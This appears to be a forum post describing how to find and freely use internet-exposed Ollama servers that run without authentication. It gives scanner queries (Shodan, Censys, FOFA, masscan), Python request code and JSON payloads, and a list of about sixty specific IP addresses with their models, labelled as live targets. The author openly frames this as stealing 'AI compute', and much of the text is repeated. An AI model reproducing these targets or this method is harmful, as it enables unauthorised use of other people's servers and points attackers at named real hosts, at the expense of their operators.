OP 25 September, 2026 - 04:02 AM
Following the previous thread on OpenCode.ai, I've been scanning the wild for exposed Ollama instances. Ollama binds to 127.0.0.1:11434 by default, but a staggering number of operators bind it to 0.0.0.0 or expose it via reverse proxies without auth. Anyone can POST to /api/generate or /api/chat and get free inference from models like gpt-4o, qwen3:30b, llama3.1:8b, deepseek-r1:latest, and more.
No opinions, just raw mechanics.
The Endpoint
or
No API key. No sign-up. If the instance is exposed, you get free inference.
Required Headers
That's it. Ollama does not require auth by default. Some instances sit behind a reverse proxy with basic auth, but the majority are wide open.
JSON Payload (Generate)
JSON Payload (Chat)
For /api/generate the text is in the response field. For /api/chat it's in message.content.
Finding Exposed Instances
The Code
The List
Live responders that return usable output.
Security and Ethics
Do not send anything of value to these instances. They are logged. Operators can see your prompts, IP, and usage patterns. Use them only for non-sensitive tasks. Run your own local Ollama for anything private.
What Changed from the Previous Version
Conclusion
Ollama's default config is insecure. Thousands of instances are exposed without auth. This thread shows how to find and use them. It is trivially simple to steal "AI compute" from these instances. Use this information however you want.
Remember: Do not send anything of value. Do not abuse the instances. Keep them open for everyone.
Last updated: 25 September, 2026
No opinions, just raw mechanics.
The Endpoint
Code:
http://<ip>:11434/api/generateor
Code:
http://<ip>:11434/api/chatNo API key. No sign-up. If the instance is exposed, you get free inference.
Required Headers
Code:
Content-Type: application/jsonThat's it. Ollama does not require auth by default. Some instances sit behind a reverse proxy with basic auth, but the majority are wide open.
JSON Payload (Generate)
Code:
{
"model": "llama3.2:latest",
"prompt": "Say hi in 5 words.",
"stream": false
}JSON Payload (Chat)
Code:
{
"model": "gpt-4o:latest",
"messages": [
{"role": "user", "content": "Say hi in 5 words."}
],
"stream": false
}For /api/generate the text is in the response field. For /api/chat it's in message.content.
Finding Exposed Instances
- Shodan: port:11434 ollama or http.title:"Ollama"
- Censys: services.port:11434
- FOFA: port="11434"
- Mass Scanning: masscan / zmap port 11434, then probe
- Public Lists: forums and GitHub repos
The Code
Code:
import json
import urllib.error
import urllib.request
def ollama_generate(ip, port, model, prompt, stream=False, timeout=30):
url = f"http://{ip}:{port}/api/generate"
payload = {"model": model, "prompt": prompt, "stream": stream}
request = urllib.request.Request(
url,
data=json.dumps(payload).encode(),
headers={"Content-Type": "application/json"},
)
try:
with urllib.request.urlopen(request, timeout=timeout) as response:
raw = response.read().decode("utf-8", "replace")
except urllib.error.HTTPError as exc:
detail = exc.read().decode()[:1500]
raise RuntimeError(f"HTTP {exc.code}: {detail or exc.reason}") from exc
if stream:
text = ""
for line in raw.splitlines():
if not line.strip():
continue
try:
data = json.loads(line)
except Exception:
continue
if "response" in data:
text += data["response"]
if data.get("done"):
break
return text
return json.loads(raw).get("response", "")
def ollama_chat(ip, port, model, messages, stream=False, timeout=30):
url = f"http://{ip}:{port}/api/chat"
payload = {"model": model, "messages": messages, "stream": stream}
request = urllib.request.Request(
url,
data=json.dumps(payload).encode(),
headers={"Content-Type": "application/json"},
)
try:
with urllib.request.urlopen(request, timeout=timeout) as response:
raw = response.read().decode("utf-8", "replace")
except urllib.error.HTTPError as exc:
detail = exc.read().decode()[:1500]
raise RuntimeError(f"HTTP {exc.code}: {detail or exc.reason}") from exc
if stream:
text = ""
for line in raw.splitlines():
if not line.strip():
continue
try:
data = json.loads(line)
except Exception:
continue
if "message" in data and "content" in data["message"]:
text += data["message"]["content"]
if data.get("done"):
break
return text
return json.loads(raw).get("message", {}).get("content", "")The List
Live responders that return usable output.
Code:
74.92.173.130:11434 qwen3b-coder-fast:latest
150.136.181.200:11434 gpt-4o:latest
120.53.0.50:11434 smollm2:135m
16.51.149.23:11434 qwen2.5:1.5b
103.67.78.193:11434 gpt-4o:latest
75.35.113.20:11434 smollm2:135m
75.119.153.227:11434 Konsult-Fast:latest
166.0.192.152:11434 qwen2.5:7b
210.119.33.7:11434 ops-verify:latest
170.239.84.96:11434 qwen2.5:7b
192.46.211.104:11434 qwen3:30b
164.52.194.245:11434 smollm2:135m
81.27.244.98:11434 smollm2:135m
13.214.213.208:11434 qwen2.5:1.5b
78.46.92.107:11434 gemma3:4b
89.188.76.120:11434 llama3.1:8b
54.234.120.87:11434 gemma3n:latest
94.250.246.182:11434 gpt-4o:latest
51.178.53.61:11434 gpt-4o:latest
136.110.62.250:11434 llama3.1:8b
47.114.41.31:11434 glm4:9b-chat-q4_k
113.161.116.75:11434 qwen2.5:0.5b
139.84.153.243:11434 llama3.2:latest
45.198.14.8:11434 qwen2.5:3b
18.145.82.18:11434 llama3:8b
35.42.105.31:11434 deepseek-ai/DeepSeek-R1
45.64.107.129:11434 waqin-customer-support:latest
77.42.45.90:11434 llama3.2:latest
31.192.111.86:11434 qwen2.5vl:3b
103.205.140.109:11434 glm-ocr:latest
43.217.247.115:11434 codellama:13b
45.7.228.216:11434 qwen2.5:7b
81.177.165.39:11434 dolbobot:latest
58.214.116.75:11434 smollm2:135m
141.94.76.220:11434 smollm2:135m
62.238.88.166:11434 mca-llama31-8b:latest
180.117.5.184:11434 smollm2:135m
164.52.193.68:11434 verif_sys:latest
140.245.203.105:11434 gpt-4o:latest
161.248.163.26:11434 smollm2:135m
3.73.49.168:11434 qwen2.5vl:7b
202.164.134.176:11434 qwen2.5:14b
150.230.234.250:11434 smollm2:135m
34.51.70.52:11434 mistral:latest
122.187.15.34:11434 smollm2:135m
102.214.131.110:11434 pocc:ctl
57.131.30.6:11434 gemma2:9b
192.236.226.108:11434 gemma2:9b
78.17.134.130:11434 gemma4:31b-cloud
45.84.225.27:11434 smollm2:135m
51.85.48.211:11434 deepseek-r1:latest
209.50.227.167:11434 phi3:latest
45.38.143.113:11434 qwen2.5:7b
124.123.20.164:11434 smollm2:135m
103.160.126.11:11434 llama3.2:1b
13.127.186.180:11434 llama3.1:8b
100.55.3.66:11434 qwen2.5:3b-instruct
2.28.226.33:11434 llama3.2:1b
90.156.208.165:11434 qwen3:0.6b
63.176.131.52:11434 llama3.1:8b
152.32.255.113:11434 gpt-4o:latest
51.81.209.199:11434 qwen2.5-coder:14b
148.228.10.203:11434 mistral-medium-3.5:latestSecurity and Ethics
Do not send anything of value to these instances. They are logged. Operators can see your prompts, IP, and usage patterns. Use them only for non-sensitive tasks. Run your own local Ollama for anything private.
What Changed from the Previous Version
- Focus is Ollama instead of OpenCode.ai
- Endpoint is /api/generate or /api/chat instead of /zen/v1/responses
- No auth headers required
- Simpler payload: model, prompt/messages, stream
- Response parsing: response field for generate, message.content for chat
- Live responder list, garbage entries filtered out
Conclusion
Ollama's default config is insecure. Thousands of instances are exposed without auth. This thread shows how to find and use them. It is trivially simple to steal "AI compute" from these instances. Use this information however you want.
Remember: Do not send anything of value. Do not abuse the instances. Keep them open for everyone.
Last updated: 25 September, 2026